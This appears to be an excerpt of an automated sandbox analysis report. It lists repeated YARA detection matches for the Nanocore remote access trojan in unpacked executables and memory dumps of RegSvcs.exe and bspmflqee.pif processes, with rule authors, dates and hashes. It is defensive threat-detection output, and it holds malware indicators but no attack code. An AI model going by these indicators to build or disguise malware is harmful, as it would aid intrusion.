        Source: 5.2.RegSvcs.exe.48bb041.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4ab3078.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4ab3078.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4ab3078.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.3.bspmflqee.pif.4a49c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4a49c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4a49c50.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 5.2.RegSvcs.exe.6fb0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.RegSvcs.exe.6fb0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 24.2.RegSvcs.exe.476560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.RegSvcs.exe.476560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 24.2.RegSvcs.exe.476560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 24.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 24.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.3.bspmflqee.pif.4b1c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4b1c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4b1c088.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 32.2.RegSvcs.exe.4a107ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 32.2.RegSvcs.exe.4a107ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 32.2.RegSvcs.exe.4a107ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 29.3.bspmflqee.pif.42de458.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 29.3.bspmflqee.pif.42de458.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.42de458.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.3.bspmflqee.pif.4b1c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4b1c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4b1c088.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.423204049.0000000004A4A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.423204049.0000000004A4A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.421938786.0000000004AB4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.421938786.0000000004AB4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000013.00000002.450398182.0000000003B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.386483303.0000000004393000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.386483303.0000000004393000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.384746745.00000000042C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.384746745.00000000042C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.421415700.0000000004A7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.421415700.0000000004A7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000013.00000002.450263245.0000000002B91000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.513759179.000000000437C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.513759179.000000000437C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.423042439.0000000004AE8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.423042439.0000000004AE8000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.423278623.0000000004AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.423278623.0000000004AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.423077125.0000000004A7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.423077125.0000000004A7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.513522579.00000000042DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.513522579.00000000042DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.387003815.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.387003815.0000000003526000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.513627931.0000000004314000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.513627931.0000000004314000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.421689539.0000000004A4A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.421689539.0000000004A4A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000013.00000002.446552957.0000000000502000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000013.00000002.446552957.0000000000502000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.513035581.00000000042DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.513035581.00000000042DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.513434193.0000000004276000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.513434193.0000000004276000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.513576200.0000000004314000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.513576200.0000000004314000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001D.00000003.516238923.0000000004313000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001D.00000003.516238923.0000000004313000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000020.00000002.539250856.00000000039C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.471749969.0000000003E23000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.471749969.0000000003E23000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.386831922.000000000435E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.386831922.000000000435E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.384936448.00000000042C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.384936448.00000000042C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.384792516.000000000432A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.384792516.000000000432A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000003.468945390.0000000003DEF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000003.468945390.0000000003DEF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000003.422088669.0000000004AE8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000003.422088669.0000000004AE8000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.386582858.000000000432A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.386582858.000000000432A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
